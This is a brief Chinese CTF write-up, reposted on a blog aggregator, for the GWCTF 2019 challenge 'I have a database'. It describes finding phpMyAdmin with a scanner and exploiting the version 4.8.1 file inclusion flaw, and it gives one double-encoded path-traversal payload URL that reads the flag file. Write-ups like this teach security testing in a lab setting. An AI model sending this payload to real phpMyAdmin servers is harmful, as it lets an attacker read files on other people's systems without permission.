码迷,mamicode.com
首页 > 数据库 > 详细

[GWCTF 2019]我有一个数据库

时间:2021-01-21 10:47:49      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:tar   image   payload   http   hex   info   code   get   有一个   

知识点

phpmyadmin的远程文件读取漏洞

审题

技术图片
我本来看这个题目是想着 把这字放到winhex里面 导出.db文件 然后拖到sqlite里面 没想到啊没想到 竟然又是扫描工具扫

phpmyadmin的远程文件读取漏洞

技术图片
扫到了phpmyadmin的页面 百度了一下4.8.1版本有远程文件包含漏洞
payload:

http://5343f641-d587-4d9e-838d-fec4d74c0c42.node3.buuoj.cn/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag

emmm不知道咋说 还是记一下吧

EOF

[GWCTF 2019]我有一个数据库

标签:tar   image   payload   http   hex   info   code   get   有一个   

原文地址:https://www.cnblogs.com/zhwyyswdg/p/14304848.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!